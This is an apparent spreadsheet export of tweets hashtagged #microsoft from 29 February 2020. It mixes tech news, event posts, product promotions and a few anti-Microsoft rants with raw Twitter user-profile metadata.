    <t>{'id': 1233649330298314757, 'id_str': '1233649330298314757', 'name': 'MK706 Reviews', 'screen_name': 'Mk706R', 'location': 'Chennai', 'description': 'Welcome to MK706 Reviews. We at MK706 will bring you the latest in smartphone and game console reviews from the tech world to you under 3-5 minutes.', 'url': 'https://t.co/rcsFZyOm6l', 'entities': {'url': {'urls': [{'url': 'https://t.co/rcsFZyOm6l', 'expanded_url': 'https://mkblogz.com/', 'display_url': 'mkblogz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 79, 'listed_count': 0, 'created_at': 'Sat Feb 29 07:05:04 +0000 2020', 'favourites_count': 17,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'http://pbs.twimg.com/profile_images/1233652307989975041/XprHH2v3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233652307989975041/XprHH2v3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233649330298314757/1582960608',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</si>
  <si>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07:27:21 +0000 2020</t>
  </si>
  <si>
    <t>This year has 366 days. After one decade or more #microsoft can claim almost full uptime for #office360</t>
  </si>
  <si>
    <t>Sat Feb 29 07:25:02 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft = #whitecollar crime founded by a white #eugenicist</t>
  </si>
  <si>
    <t>Sat Feb 29 07:24:07 +0000 2020</t>
  </si>
  <si>
    <t>On my travels early this morning to Glasgow for the first Scottish Summit! Looking forward to a day of learning! #ss2020 #alwayslearning #community #microsoft</t>
  </si>
  <si>
    <t>{'id': 222781429, 'id_str': '222781429', 'name': 'Colin Beveridge', 'screen_name': 'cbevey', 'location': 'Scotland, United Kingdom', 'description': 'Geek who loves using tech to empower people and outdoor enthusiast!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 193, 'friends_count': 643, 'listed_count': 65, 'created_at': 'Sat Dec 04 12:42:19 +0000 2010', 'favourites_count': 1802, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1936,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'http://pbs.twimg.com/profile_images/1864321340/image_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1864321340/image_normal.jpg',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</si>
  <si>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07:23:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure IoT releases a new version of the Python SDK https://t.co/DtCdhtKAwi #Azure #IoT #Python #Developers #DevOps #AzOps #Cloud https://t.co/4Ds8rgmqFk</t>
  </si>
  <si>
    <t>Sat Feb 29 07:22:56 +0000 2020</t>
  </si>
  <si>
    <t>#Nokia to Weigh Strategic Options as Profit Pressure Mounts https://t.co/rBTir2VHri #microsoft killed Nokia https://t.co/ii9OOF2xrf</t>
  </si>
  <si>
    <t>Sat Feb 29 07:20:38 +0000 2020</t>
  </si>
  <si>
    <t>.....theyre going to get a $6 #Starbucks, call friends from their #Apple iPhone, use their iPhones on #ATT or #Verizon to #Google that #Microsoft product from #Amazon. Relax. The world is not ending. (yes, this might be cryptic.) check stock prices.</t>
  </si>
  <si>
    <t>{'id': 75962495, 'id_str': '75962495', 'name': 'Chase J. Passeri (Text "TRUMP" to 88022)', 'screen_name': 'KingOfContent18', 'location': 'Out Of This World', 'description': 'WE ARE #ONE!Cherish the blessings you have been gifted! #GOD #Christ #Family #Vets #Economics #Ferrari #Tech #Science #Physics #Astronomy #KAGâœï¸ðŸ‡ºðŸ‡¸ðŸ‡®ðŸ‡¹ðŸ™â˜„ï¸âš¡ï¸\U0001fa90', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 905, 'friends_count': 652, 'listed_count': 7, 'created_at': 'Mon Sep 21 05:08:41 +0000 2009', 'favourites_count': 60977, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20037, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1FD925', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1110518866537598976/XZlS_UvR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110518866537598976/XZlS_UvR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75962495/1534668558', 'profile_link_color': 'E81721',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</si>
  <si>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Sat Feb 29 07:17:57 +0000 2020</t>
  </si>
  <si>
    <t>Dynamics Consult sponsor  al CoreTech Summit 2020 - https://t.co/JEdnWPvgus #socialandtech #technews #CoreTechSummit2020 #DynamicsConsult #ERPMicrosoft #ERP #microsoft https://t.co/T3xBWvZy0j</t>
  </si>
  <si>
    <t>{'id': 602251494, 'id_str': '602251494', 'name': 'SocialandTech', 'screen_name': 'SocialandTech', 'location': '', 'description': 'Il portale dedicato alla tecnologia, ai Social Network e alla scienza.', 'url': 'https://t.co/dSJgvUVy2e', 'entities': {'url': {'urls': [{'url': 'https://t.co/dSJgvUVy2e', 'expanded_url': 'http://www.socialandtech.net', 'display_url': 'socialandtech.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 926, 'friends_count': 1286, 'listed_count': 56, 'created_at': 'Thu Jun 07 20:19:10 +0000 2012', 'favourites_count': 444, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10630,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'http://pbs.twimg.com/profile_images/685197972104167424/OfGvXOX__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/685197972104167424/OfGvXOX__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/602251494/1514470413',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</si>
  <si>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Sat Feb 29 07:17:02 +0000 2020</t>
  </si>
  <si>
    <t>Pushing myself in &amp;amp; out if work. Had to squeeze in a hotel work @DoubleTree before heading to the @scottishsummit #SS2020. Nothing getting in the way of my weekend workout, 5am get up it was!!
Now to go train my brain for the day!!
#TechGeeksWhoLift #Gym #Microsoft #Dynamics365 https://t.co/7oFgMJMW7W</t>
  </si>
  <si>
    <t>Sat Feb 29 07:16:11 +0000 2020</t>
  </si>
  <si>
    <t>Go through an intense action story as Joanna and take out enemies in Perfect Dark Zero https://t.co/FsRerqYa3O #microsoft #xbox #xbox360 #gaming #darkness https://t.co/1v1LN9shsu</t>
  </si>
  <si>
    <t>Sat Feb 29 07:13:54 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Certification Roadmap for Role-based Paths
 #AzureAdministrator #DevOps #microsoftcertified #SolutionsArchitect #Microsoft
https://t.co/LI0WI6c053</t>
  </si>
  <si>
    <t>Sat Feb 29 07:13:13 +0000 2020</t>
  </si>
  <si>
    <t>Top Stories from the #Microsoft DevOps Community  2020.02.28 https://t.co/tzQN5V50LX #Azure #IaC #AzureDevOps #Code #pipelines #DevOps #Developers   https://t.co/Kp7aRj8ktc</t>
  </si>
  <si>
    <t>Sat Feb 29 07:10:17 +0000 2020</t>
  </si>
  <si>
    <t>#TheFutureOfWork #Microsoft #PMIUAE. Let's do this! @PMIUAEChapter https://t.co/96dW5uhAMQ</t>
  </si>
  <si>
    <t>Sat Feb 29 07:10:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams gets Outlook integrated experience and more in the latest update https://t.co/BcwW8Yhwuu #microsoft #feedly</t>
  </si>
  <si>
    <t>Sat Feb 29 07:09:42 +0000 2020</t>
  </si>
  <si>
    <t>Download Microsoft Edge Browser 82.0.435.0 Read more - https://t.co/EqAeoZoTeZ #Edge #EdgeBrowser
#Microsoft #Download https://t.co/fJbRJQBI04</t>
  </si>
  <si>
    <t>Sat Feb 29 07:08:26 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft propagandist Simon Bisson uses #cbs sites to push the lie that #microsoft and #vista10 are what determin... https://t.co/glOe1mWA5K</t>
  </si>
  <si>
    <t>{'id': 3099404849, 'id_str': '3099404849', 'name': 'Jozef McGregory', 'screen_name': 'McMcgregory', 'location': 'Silicon Valley', 'description': 'Big Data Pro and Machine Learning Expert. Creator of Big Data field and the most modern programming languages.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3995, 'friends_count': 36, 'listed_count': 2449, 'created_at': 'Fri Mar 20 14:30:42 +0000 2015', 'favourites_count': 206763, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28827,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'http://pbs.twimg.com/profile_images/578927253100318721/IWplgHGJ_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/578927253100318721/IWplgHGJ_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3099404849/1426862300',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</si>
  <si>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07:08:00 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft propagandist Simon Bisson uses #cbs sites to push the lie that #microsoft and #vista10 are what determines if "Containers are the future"
Why do they hire  nontechnical loon-toons?</t>
  </si>
  <si>
    <t>Sat Feb 29 07:04:59 +0000 2020</t>
  </si>
  <si>
    <t>SCANDAL  Windows 8
#satisfaction #Microsoft #windows8
#scandal # #sukyandaru #scandalband #scandaljapan #mami #haruna #rina #tomomi #jpop #jrock #girlband #harunaono #haru #ono #mamisasazaki #sasazaki... https://t.co/s7KVwTMBbv</t>
  </si>
  <si>
    <t>{'id': 226212889, 'id_str': '226212889', 'name': 'scandal.jmusic.mania', 'screen_name': 'jmusic_mania', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 94, 'listed_count': 4, 'created_at': 'Mon Dec 13 16:20:55 +0000 2010', 'favourites_count': 218, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13176,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'http://pbs.twimg.com/profile_images/1185658484819292160/uNlcBvAO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185658484819292160/uNlcBvAO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/226212889/1571517986',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</si>
  <si>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07:04:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Browser New Update Allows Users to Block Potential Unwanted Application. Read more - https://t.co/vZO1D6HAqn #Edge #browser #Microsoft #tech #TechnologyNews https://t.co/5ODGuXtogi</t>
  </si>
  <si>
    <t>Sat Feb 29 07:03:30 +0000 2020</t>
  </si>
  <si>
    <t>As part of its digital transformation journey, #MultiChoice Group partnered with #Microsoft South #Africa - #Azure #Security #M365 #D365 #AI  - Alkis Flemetakis Bradley Eliot https://t.co/szbNofXuRA #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 07:00:36 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 07:00:21 +0000 2020</t>
  </si>
  <si>
    <t>@instagram has released its progressive #web #app (PWA) on the @Microsoft Store with a bouquet of different enhancements https://t.co/z0i2CHCJAO
#PWA #instagram #microsoft #technology #sociamedia #window10 #technews</t>
  </si>
  <si>
    <t>{'id': 371886192, 'id_str': '371886192', 'name': 'CFAmedia.ng', 'screen_name': 'cfamediadotng', 'location': 'Lagos, Nigeria', 'description': 'We provide the best insight on internet, innovation, and entrepreneurship in Africa shared with more than 10 Million people weekly.', 'url': 'https://t.co/bn5lXSGvPd', 'entities': {'url': {'urls': [{'url': 'https://t.co/bn5lXSGvPd', 'expanded_url': 'https://cfamedia.ng/', 'display_url': 'cfamedia.ng', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1045, 'friends_count': 399, 'listed_count': 19, 'created_at': 'Sun Sep 11 18:11:29 +0000 2011', 'favourites_count': 882, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12193,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'http://pbs.twimg.com/profile_images/1084713608930574336/aqiQLeOV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084713608930574336/aqiQLeOV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/371886192/1559572795', 'profile_link_color': '19CF86',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</si>
  <si>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06:59:45 +0000 2020</t>
  </si>
  <si>
    <t>Its official: Facebook removed its Windows 10 app from the Microsoft Store https://t.co/I45zl9k6Pi #microsoft #feedly</t>
  </si>
  <si>
    <t>Sat Feb 29 06:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Last chance to get involved, do not late! This month @Meetup - #SQLSaturday Voting and Database CI/CD part 2
https://t.co/vhAvLwF0S8
#tsql #sqldba #SQLServer #microsoft #madeiradata https://t.co/wxdL3rj29v</t>
  </si>
  <si>
    <t>Sat Feb 29 06:56:10 +0000 2020</t>
  </si>
  <si>
    <t>Success is ultimately grounded in being able to share a great story. I think youll enjoy this one my boss, Scott, has shared below. Check it out!
#outcomesfirst
#microsoft
#modernworkplace
#manufacturing
#microsoftteams https://t.co/IdvKAlyhhm</t>
  </si>
  <si>
    <t>Sat Feb 29 06:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Bing is working on launching a new tool in the list of webmaster tools known as Sitemap Diagnosis Tool. Sitemaps are an excellent way to tell Bing about URLs on your site. #Bing #Search_engine #Sitemap_diagnosis_tool #webmaster #SEO #Microsoft #Curvearro
https://t.co/meWydHR88c https://t.co/fIGb5Z7RnC</t>
  </si>
  <si>
    <t>{'id': 1126727864387170304, 'id_str': '1126727864387170304', 'name': 'Curvearro', 'screen_name': 'curvearro', 'location': 'Global (HQ: New Delhi, India)', 'description': 'Curvearro | Digital Marketing Agency', 'url': 'https://t.co/tEg8du4LzE', 'entities': {'url': {'urls': [{'url': 'https://t.co/tEg8du4LzE', 'expanded_url': 'https://www.curvearro.com', 'display_url': 'curvearro.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 2, 'listed_count': 1, 'created_at': 'Fri May 10 05:57:11 +0000 2019', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 268,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'http://pbs.twimg.com/profile_images/1126727963829891073/P-NJcLxY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126727963829891073/P-NJcLxY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126727864387170304/1557468059',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</si>
  <si>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06:54:51 +0000 2020</t>
  </si>
  <si>
    <t>Facebook can now convert any 2D photo into a 3D photo https://t.co/Jl1F45giIf #microsoft #feedly</t>
  </si>
  <si>
    <t>Sat Feb 29 06:54:11 +0000 2020</t>
  </si>
  <si>
    <t>Bill Gates reveals how to respond to Coronavirus (COVID-19) outbreak https://t.co/5kNsaaJzi6 #microsoft #feedly</t>
  </si>
  <si>
    <t>Sat Feb 29 06:52:50 +0000 2020</t>
  </si>
  <si>
    <t>MICROSOFT OFFICE PROFESSIONAL PLUS 2019 License Key Fast Delivery 32/64bit #2019 #32/64BIT #Delivery #FAST #License #Microsoft #office #Plus #professional https://t.co/MfXIaQvd5B</t>
  </si>
  <si>
    <t>Sat Feb 29 06:45:37 +0000 2020</t>
  </si>
  <si>
    <t>#Cloud updates for February 28, 2020
https://t.co/0WLURGeFeR
#AWS #OCI #Azure #Oracle #ActiveDirectory #Amazon #Microsoft #AI #ArtificialIntelligence #SageMaker #Networking #IaaS #CostManagement #CodeGuru #CloudArchitecture #BlockStorage #ML https://t.co/NhICSLg7WF</t>
  </si>
  <si>
    <t>Sat Feb 29 06:31:29 +0000 2020</t>
  </si>
  <si>
    <t>100% OFF
Learn Microsoft Teams 
#microsoftteams #teams #course #microsoft
https://t.co/72A5Sd7BtU</t>
  </si>
  <si>
    <t>Sat Feb 29 06:24:49 +0000 2020</t>
  </si>
  <si>
    <t>Part II of our research team's research on Named Pipes.  Dynamic and Static analysis of named pipes for Windows applications https://t.co/lZsB8HlBI6 #research #hacking #Windows #Microsoft #vulnerability</t>
  </si>
  <si>
    <t>{'id': 1620702908, 'id_str': '1620702908', 'name': 'Tony UV', 'screen_name': 't0nyuv', 'location': 'Dirty South', 'description': '@VerSprite CEO &amp; Founder | #OWASP Chapter Leader, Author of Process for Attack Simulation &amp; Threat Analysis - #risk centric #threatmodeling book', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 748, 'friends_count': 587, 'listed_count': 84, 'created_at': 'Thu Jul 25 15:57:23 +0000 2013', 'favourites_count': 1236, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1866,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1037297546287304704/2t168-JO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1037297546287304704/2t168-JO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1620702908/1536145984',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</si>
  <si>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06:23:40 +0000 2020</t>
  </si>
  <si>
    <t>Shared the new #Microsoft Education Center to a group of teachers during a MOOC Meet-Up!
#mseduph #theborderlessclassroom
#Road2e2 https://t.co/3IP4ynsxWH</t>
  </si>
  <si>
    <t>{'id': 16960701, 'id_str': '16960701', 'name': 'Daniel Timbal', 'screen_name': 'danieltimbal', 'location': 'davao city', 'description': 'Technology Integration Specialist | EdTech Coach | Teacher |MOOCer | Microsoft Certified Educator | I blog at #theborderlessclassroom.com', 'url': 'https://t.co/nIlRUBcvzb', 'entities': {'url': {'urls': [{'url': 'https://t.co/nIlRUBcvzb', 'expanded_url': 'http://theborderlessclassroom.com', 'display_url': 'theborderlessclassroom.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 90, 'listed_count': 6, 'created_at': 'Sat Oct 25 02:02:22 +0000 2008', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 182, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFB60A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1099803188998230016/SEXY5C1D_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099803188998230016/SEXY5C1D_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16960701/1582839524',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</si>
  <si>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06:23:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft edge and chrome and feedback and google and youtube and playback and audio and server and service issues and bad response and bad browsing</t>
  </si>
  <si>
    <t>Sat Feb 29 06:22:38 +0000 2020</t>
  </si>
  <si>
    <t>Great presentation by @automationnext  on Kubernetes Authentication and Authorization  #devengers #microsoft #docker #hyderabad #kubernetes</t>
  </si>
  <si>
    <t>{'id': 1089623580, 'id_str': '1089623580', 'name': 'Prashanth', 'screen_name': 'iprashanthnani', 'location': 'Hyderabad, India', 'description': 'Software Architecture | DevOps | Coding in C#, Python and JavaScript', 'url': 'https://t.co/LK6U2AeS4R', 'entities': {'url': {'urls': [{'url': 'https://t.co/LK6U2AeS4R', 'expanded_url': 'http://prashanth-nani.github.io', 'display_url': 'prashanth-nani.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 210, 'friends_count': 410, 'listed_count': 3, 'created_at': 'Mon Jan 14 17:27:13 +0000 2013', 'favourites_count': 1357, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 197,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'http://pbs.twimg.com/profile_images/1217186989822205952/vmRZAi5S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217186989822205952/vmRZAi5S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1089623580/1476813477', 'profile_link_color': '2FC2EF',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</si>
  <si>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Sat Feb 29 06:20:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft all microsoft site's and page's and edge and browsing bad so much</t>
  </si>
  <si>
    <t>Sat Feb 29 06:16:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Compact Optical Mouse 500 Black USB https://t.co/0FUB6WeFGJ #Microsoft</t>
  </si>
  <si>
    <t>{'id': 496442030, 'id_str': '496442030', 'name': 'Product catalog', 'screen_name': 'apatab', 'location': '', 'description': 'Very large catalog of products for home and family. Here you will find the products that interest you with their characteristics, features, prices and reviews', 'url': 'http://t.co/5SWPTzUqkn', 'entities': {'url': {'urls': [{'url': 'http://t.co/5SWPTzUqkn', 'expanded_url': 'http://specsen.com/', 'display_url': 'specsen.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3154, 'friends_count': 2747, 'listed_count': 355, 'created_at': 'Sat Feb 18 23:48:26 +0000 2012', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1705666,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'http://pbs.twimg.com/profile_images/650384659516252160/T_TTbCEK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/650384659516252160/T_TTbCEK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/496442030/1377864960', 'profile_link_color': '599480',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</si>
  <si>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06:11:40 +0000 2020</t>
  </si>
  <si>
    <t>Hope she ain't sad... Lol  
..
#Microsoft is neutering Cortana https://t.co/Gn8j4VdgZX 
#smart #pc #technews</t>
  </si>
  <si>
    <t>Sat Feb 29 06:09:07 +0000 2020</t>
  </si>
  <si>
    <t>If theres one thing thats going to be the real currency for the next 10 years, [it] is how devoted and inclusive are your teams that are building all these technologies, in terms of gender diversity and ethnic diversity.
 Satya Nadella, CEO of #Microsoft 
#CEO #SatyaNadella</t>
  </si>
  <si>
    <t>{'id': 2931966927, 'id_str': '2931966927', 'name': 'Durgesh M', 'screen_name': 'Kumardk83', 'location': 'India', 'description': 'No special skills to mention.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 412, 'friends_count': 242, 'listed_count': 20, 'created_at': 'Fri Dec 19 13:20:30 +0000 2014', 'favourites_count': 3159, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2914,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'http://pbs.twimg.com/profile_images/1108233835135885312/qO7cNGbF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108233835135885312/qO7cNGbF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2931966927/1552548075',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</si>
  <si>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06:02:57 +0000 2020</t>
  </si>
  <si>
    <t>#dynamics365 going more and more into operations... Day to day work... Retail is a key strength now with more fraud protection and connected stores...
 #operations #digital #fraudprotection #supplychain #microsoft #d365Saturday #ai #connected #going #dig...https://t.co/aEY7mGJXaK</t>
  </si>
  <si>
    <t>{'id': 47876815, 'id_str': '47876815', 'name': 'Mohamad Barada', 'screen_name': 'mbarada', 'location': 'Lebanon', 'description': 'Strategic Life Coach | Motivational Speaker | Senior #ERP &amp; #CRM Senior Consultant specialized in Microsoft Dynamics AX, NAV &amp; CRM | Trainer | Public Speaker', 'url': 'https://t.co/Mwhfy95jVN', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mwhfy95jVN', 'expanded_url': 'http://www.scroll-up.com', 'display_url': 'scroll-up.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 480, 'friends_count': 592, 'listed_count': 32, 'created_at': 'Wed Jun 17 06:19:09 +0000 2009', 'favourites_count': 154, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2618, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '140F16', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1173702225023119366/N5BbUVwA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173702225023119366/N5BbUVwA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47876815/1568667420', 'profile_link_color': '423F48', 'profile_sidebar_border_color': 'F8BB84', 'profile_sidebar_fill_color': 'EDDAA0', 'profile_text_color': 'D1BDA2', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 06:01:47 +0000 2020</t>
  </si>
  <si>
    <t>February 29 leap day a date that occurs every four years. Let's connect and spend an additional day of the year wisely.
Visit us at: https://t.co/6eGLwfibxg
#CRM #MicrosoftDynamics365 #Dynamics365 #Microsoft #Soluzione #leapday #leapyear #february29 https://t.co/T8AEmiwEF3</t>
  </si>
  <si>
    <t>Sat Feb 29 06:01:03 +0000 2020</t>
  </si>
  <si>
    <t>February 29 leap day a date that occurs every four years. Let's connect and spend an additional day of the year wisely.
Visit us at: https://t.co/M0I8RL57Wk
#CRM #MicrosoftDynamics365 #Dynamics365 #Microsoft #Soluzione #leapday #leapyear #february29 https://t.co/9EZXSGHreP</t>
  </si>
  <si>
    <t>Sat Feb 29 06:00:05 +0000 2020</t>
  </si>
  <si>
    <t>#Azure #Security Center is happy to announce a preview for detecting #fileless #attacks on #Linux - Ben Nick #Microsoft https://t.co/KVhnhC4tOx #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 05:58:30 +0000 2020</t>
  </si>
  <si>
    <t>PowerShell: Create #Azure IoT Hub
 #AzurePowerShell #Microsoft
https://t.co/2FBLZX2ci3</t>
  </si>
  <si>
    <t>Sat Feb 29 05:56:29 +0000 2020</t>
  </si>
  <si>
    <t>@MuhammadAlamMS opening today's #D365Dubai summit - room full of partners and customers excited about #MSDyn365 roadmap and vision of business applications #Microsoft https://t.co/UmpItxkmFm</t>
  </si>
  <si>
    <t>{'id': 200812168, 'id_str': '200812168', 'name': 'Elena', 'screen_name': 'edjonova', 'location': 'Dubai, United Arab Emirates', 'description': 'TS D365 F&amp;O @Microsoft', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 495, 'friends_count': 759, 'listed_count': 9, 'created_at': 'Sun Oct 10 09:56:41 +0000 2010', 'favourites_count': 694, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1120,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'http://pbs.twimg.com/profile_images/1042137700038582273/4IaRiVGY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042137700038582273/4IaRiVGY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/200812168/1519532467', 'profile_link_color': '93A644', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 05:50:50 +0000 2020</t>
  </si>
  <si>
    <t>Let's talk about helm #microsoft #dockers #Hyderabad https://t.co/9cjjzi6h2A</t>
  </si>
  <si>
    <t>{'id': 136530800, 'id_str': '136530800', 'name': 'Siddharth Sethi', 'screen_name': 'sethitweeting', 'location': 'Delhi', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 98, 'listed_count': 0, 'created_at': 'Sat Apr 24 05:54:07 +0000 2010', 'favourites_count': 380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1004688852747878401/jmc6MQcg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1004688852747878401/jmc6MQcg_normal.jpg',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</si>
  <si>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05:48:03 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft still a #copyright #bully of #artificialscarcity https://t.co/8kbst5JfE8</t>
  </si>
  <si>
    <t>Sat Feb 29 05:47:35 +0000 2020</t>
  </si>
  <si>
    <t>Dad Creates Custom Controller So Disabled Daughter Can Play Vide - News On 6 #microsoft #Nintendo @jerseyitguy  https://t.co/Nl7vrg0h7u</t>
  </si>
  <si>
    <t>{'id': 1110475417, 'id_str': '1110475417', 'name': 'ChrisâœžchronicpainDAD', 'screen_name': 'ChronicPainDad', 'location': 'Edmonton, Alberta, Canada', 'description': 'â™°CHRIST 1stâ™° Family is Everything. #SAHD Conquering #ChronicPain #Scoliosis #Fibromyalgia #CFS... 1 Day at a Time. #Hope #Believe #NeverGiveUp Joshua 1:9', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 20840, 'friends_count': 20055, 'listed_count': 452, 'created_at': 'Tue Jan 22 02:37:00 +0000 2013', 'favourites_count': 157877, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 162659,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'http://pbs.twimg.com/profile_images/1021548670208995329/igsRPDN8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021548670208995329/igsRPDN8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110475417/1532642481',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</si>
  <si>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05:45:02 +0000 2020</t>
  </si>
  <si>
    <t>#juve writes about #patenttroll #ipcom https://t.co/WwczyigqWT #microsoft turned #nokia into troll as well: https://t.co/ii9OOF2xrf</t>
  </si>
  <si>
    <t>Sat Feb 29 05:44:46 +0000 2020</t>
  </si>
  <si>
    <t>New update is out for Minecraft Earth- 0.13.0 Get the breakdown so you know how to find the new mobs!  https://t.co/GsQgnrZCBU #minecraft #MinecraftEarth #NewUpdate #mojang #Microsoft https://t.co/ztORRDc5HI</t>
  </si>
  <si>
